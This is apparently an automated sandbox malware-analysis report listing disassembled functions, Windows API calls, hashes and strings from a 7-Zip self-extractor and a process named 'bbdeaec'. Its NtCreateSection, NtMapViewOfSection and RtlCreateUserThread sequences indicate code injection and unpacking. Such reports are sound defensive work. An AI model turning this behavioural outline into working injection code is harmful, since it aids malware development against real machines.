Part of subcall function 000000014000A118: GetSystemMetrics.USER32 ref: 000000014000A27F

GetClientRect.USER32 ref: 000000014000AA75
GetDlgItem.USER32 ref: 000000014000AA86
GetClientRect.USER32 ref: 000000014000AAA9
GetDlgItem.USER32 ref: 000000014000AAF6

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Item$MetricsSystem$ClientLongRectWindow
String ID:
API String ID: 2818034528-0
Opcode ID: 1687090e4f1e792b97675591ad16dbb24b8f61bfac3ee79ef8c238123b8a3f6f
Instruction ID: df6919512447fbe9cd5466cb71f750e2e906a2b5aef89cc43ce7c2ace63f2122
Opcode Fuzzy Hash: 1687090e4f1e792b97675591ad16dbb24b8f61bfac3ee79ef8c238123b8a3f6f
Instruction Fuzzy Hash: 0E21577260464187E711DB26F44478ABBA0F3CAB98F244219FB9807BA9CB3DD845CB44

Function 000000014000BBF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

ScreenToClient.USER32 ref: 000000014000BC41
GetClientRect.USER32 ref: 000000014000BC57
PtInRect.USER32 ref: 000000014000BC65

Part of subcall function 000000014000B354: KillTimer.USER32 ref: 000000014000B36C

CallNextHookEx.USER32 ref: 000000014000BC8A

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 480dc8bd860381275dbcb2b3cfb9e20d3c829652098b5aefab881d1f6bee3b3b
Instruction ID: afe980f8de0024294af7d57e3704c6222ac748531bb088123d1fc463b031e5b3
Opcode Fuzzy Hash: 480dc8bd860381275dbcb2b3cfb9e20d3c829652098b5aefab881d1f6bee3b3b
Instruction Fuzzy Hash: 9111E675204A41C2FA16DB17E894BA963A0B79CBC4F64442AFB4E87674DF38CD86C700

Function 000000014000A9CC Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 000000014000A9F3
CreateFontIndirectW.GDI32 ref: 000000014000AA0A
GetDlgItem.USER32 ref: 000000014000AA21
SendMessageW.USER32 ref: 000000014000AA34

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 2c1841ae52db38bdad9c0936b3bcf2ff07c87b937ffcfed794aed539c46852f5
Instruction ID: 77b3ed98445d90585e203104df3b1ae813a919a0c71941f792ac75a72c1fd89d
Opcode Fuzzy Hash: 2c1841ae52db38bdad9c0936b3bcf2ff07c87b937ffcfed794aed539c46852f5
Instruction Fuzzy Hash: C0016932200A8486EB628B52F5447D963A0FB8DBC8F188129EF8D036A4DF3CC949C700

Function 000000014000AC40 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 000000014000AC5B
GetWindowTextLengthW.USER32 ref: 000000014000AC64
GetDlgItem.USER32 ref: 000000014000AC74
SetWindowTextW.USER32 ref: 000000014000AC83

Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058B7
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058C1
Part of subcall function 000000014000585C: SetWindowTextW.USER32 ref: 00000001400058CE
Part of subcall function 000000014000585C: ??3@YAXPEAX@Z.MSVCRT ref: 00000001400058DB

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@TextWindow$Item$Length
String ID:
API String ID: 4031798017-0
Opcode ID: f12ac23c49f599083fb9d36d2e0e5cf0a38250fc0eff98ecaf5b30fb5ae219b2
Instruction ID: 5d6496181261462c0915d4228469efdb76b185da26c00bf3824badf1e2e3f054
Opcode Fuzzy Hash: f12ac23c49f599083fb9d36d2e0e5cf0a38250fc0eff98ecaf5b30fb5ae219b2
Instruction Fuzzy Hash: 11F0FE35704B8182EA45AB93F84439A6360F7DDFD5F189429AF5E47725DE38C8518700

Function 0000000140001F34 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 0000000140001F3F
GetLastError.KERNEL32 ref: 0000000140001F49
SetLastError.KERNEL32 ref: 0000000140001F58
GetFileAttributesW.KERNEL32 ref: 0000000140001F65

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 28fc8308dde2d3ee48792d6cbfcb0da7ed1c68f0bc4a1da2d127f15d21928489
Instruction ID: 6e8ef865eba8d5354af7c652a7ad179180ace349713e99db124c79653ff336b7
Opcode Fuzzy Hash: 28fc8308dde2d3ee48792d6cbfcb0da7ed1c68f0bc4a1da2d127f15d21928489
Instruction Fuzzy Hash: 57F0EDB060460692FB669BB768483F922A29BEDBD5F980534F766875F0EF388D854240

Function 00000001400021CC Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00000001400021E1
GetWindowRect.USER32 ref: 00000001400021F5
ScreenToClient.USER32 ref: 0000000140002201
ScreenToClient.USER32 ref: 000000014000220E

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 55a43b4053019dea46f0684e0c4e1872998a85566e050c804256634632fe0d49
Instruction ID: eec8631daeff4a8b40e03ae8334af5c7b4b288ff28bb09228d502775c28c9567
Opcode Fuzzy Hash: 55a43b4053019dea46f0684e0c4e1872998a85566e050c804256634632fe0d49
Instruction Fuzzy Hash: 16F01C31714B91C2EA158B93B844399A361EBDDFC0F089065EF4B47B68DE3CC8968700

Function 0000000140006B60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000AEC0: GetSystemMetrics.USER32 ref: 000000014000AF22
Part of subcall function 000000014000AEC0: GetSystemMetrics.USER32 ref: 000000014000AF38

wsprintfW.USER32 ref: 0000000140006C18
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006C67

Strings

%X - %03X - %03X - %03X - %03X, xrefs: 0000000140006BF8

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: MetricsSystem$??3@wsprintf
String ID: %X - %03X - %03X - %03X - %03X
API String ID: 1174869416-1993364030
Opcode ID: 01b2a11208a023f90a599f1703953f6435cbef190b9e12f3ba11b393b00809df
Instruction ID: ffd680598031eff7428291d90b40d6fd7eb1d39fdf9b6260418624d11b2a51cb
Opcode Fuzzy Hash: 01b2a11208a023f90a599f1703953f6435cbef190b9e12f3ba11b393b00809df
Instruction Fuzzy Hash: 63311CB2604A8192EB12EF52F4813DA6361F7983C4F90401AFB4D576BADF7DC949CB10

Function 000000014000A514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 000000014000A54F

Part of subcall function 00000001400021CC: GetParent.USER32 ref: 00000001400021E1
Part of subcall function 00000001400021CC: GetWindowRect.USER32 ref: 00000001400021F5
Part of subcall function 00000001400021CC: ScreenToClient.USER32 ref: 0000000140002201
Part of subcall function 00000001400021CC: ScreenToClient.USER32 ref: 000000014000220E

Part of subcall function 000000014000A0B8: GetDlgItem.USER32 ref: 000000014000A0DB
Part of subcall function 000000014000A0B8: SetWindowPos.USER32 ref: 000000014000A100

Strings

, xrefs: 000000014000A535
, xrefs: 000000014000A548

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ClientItemScreenWindow$ParentRect
String ID: $
API String ID: 2675214473-227171996
Opcode ID: 51f079e4d4f4fcc71bf2904cbd48d06344dddafd7faa8d6738712749788bde5f
Instruction ID: a894e37796efc521092dfa17ded35d1c22eb5227e5060540a828780cb5199e9f
Opcode Fuzzy Hash: 51f079e4d4f4fcc71bf2904cbd48d06344dddafd7faa8d6738712749788bde5f
Instruction Fuzzy Hash: 97116D72224A4587C714CF2AF44479ABBA1F3D9B98F648215FB8947B68CB3DD845CB40

Function 000000014001F8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 000000014001F937
__setusermatherr.MSVCRT ref: 000000014001F982

Strings

MZ`, xrefs: 000000014001F8DD

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: __set_app_type__setusermatherr
String ID: MZ`
API String ID: 2629043507-2330268423
Opcode ID: de51e5fa6a5e01599c3b7a90381da6932179d8692d1a97bd94d68b8f77d4d8dc
Instruction ID: d474ff2474bbd5d39d74a2b21028d853ddfa101fb484800192a33e05758a9e4a
Opcode Fuzzy Hash: de51e5fa6a5e01599c3b7a90381da6932179d8692d1a97bd94d68b8f77d4d8dc
Instruction Fuzzy Hash: DA21FE74A01601D6EB62DB66E8883F832E0B74D7A5F104925F7198B1F1DB3E8885D700

Function 00000001400071C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00000001400071E5
GetLastError.KERNEL32 ref: 000000014000721C

Strings

, xrefs: 00000001400071F1

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ErrorLast_wtol
String ID:
API String ID: 3876490843-3916222277
Opcode ID: 33be8e3848a09fd9500c59ae6585812a037844551d2fa08a20a7f881c3d6e97d
Instruction ID: ea90c0da60f31b2d8a83e238c5a0069b670d9b42edf899a33ef11bff61e78868
Opcode Fuzzy Hash: 33be8e3848a09fd9500c59ae6585812a037844551d2fa08a20a7f881c3d6e97d
Instruction Fuzzy Hash: 78F0FFF2E1110185FB77AB777811BEA11E0D769BC5F584411FB1A834F2E67C48824251

Function 0000000140005C3C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 0000000140005C56

Strings

7-Zip SFX, xrefs: 0000000140005C40
Could not allocate memory, xrefs: 0000000140005C47

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: 61f8dc8ebc24ede4eb8e4a0143fdbea6a03498d823c57421016280b11032f58e
Instruction ID: 8c89bf7d4130e696c480860fcb39a5bc1e7e3be71cd24c060f983e8645672567
Opcode Fuzzy Hash: 61f8dc8ebc24ede4eb8e4a0143fdbea6a03498d823c57421016280b11032f58e
Instruction Fuzzy Hash: 12C08C30702605E0EB1AABE3AC423C022A0B32C3C8FC00C0ADA0943230CEBCC6CBC700

Analysis Process: bbdeaecPID: 4828, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	7%
Dynamic/Decrypted Code Coverage:	28.6%
Signature Coverage:	0%
Total number of Nodes:	168
Total number of Limit Nodes:	7

Executed Functions

Function 00416EC0 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 299
windowtimefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416FDA
GetFocus.USER32 ref: 00416FE0
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00416FED
FindAtomW.KERNEL32(00000000), ref: 00416FF4
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00416FFC
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00417023
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041702C
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00417042
GetEnvironmentStringsW.KERNEL32 ref: 00417048
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041708D
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041709C
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004170A5
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004170BA
ReleaseMutex.KERNEL32(00000000), ref: 004170CA
SetCommState.KERNELBASE(00000000,00000000), ref: 004170F4
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417125
GetComputerNameW.KERNEL32(?,?), ref: 00417139
GetFileAttributesA.KERNEL32(00000000), ref: 00417140
GetConsoleAliasExesLengthA.KERNEL32 ref: 00417146
GetBinaryType.KERNEL32(0041934C,?), ref: 00417158
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041716B
GetLongPathNameW.KERNEL32(00419360,?,00000000), ref: 0041717E
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00417186
LoadLibraryW.KERNELBASE(00419374), ref: 00417212

Strings

}$, xrefs: 00417271
k`, xrefs: 0041724D

Memory Dump Source

Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd

Similarity

API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
String ID: k`$}$
API String ID: 4079765171-956986773
Opcode ID: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
Instruction ID: bd4547cb626b20a29bef7dd1c272b8299b50ccc80d2d00de4cf5370715da157f
Opcode Fuzzy Hash: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
Instruction Fuzzy Hash: 06A1C171801128ABC724DB61EC45BDF7B78EF5D314F0181AEF609A3160DB385A89CBAD

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 005A003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005A024D

Strings

cess, xrefs: 005A018D
kernel32.dll, xrefs: 005A008F, 005A0095

Memory Dump Source

Source File: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5a0000_bbdeaec.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 339b6381adfffe255570805e1953e9d3465a61c11f423d1475d0b3c283b03e5d
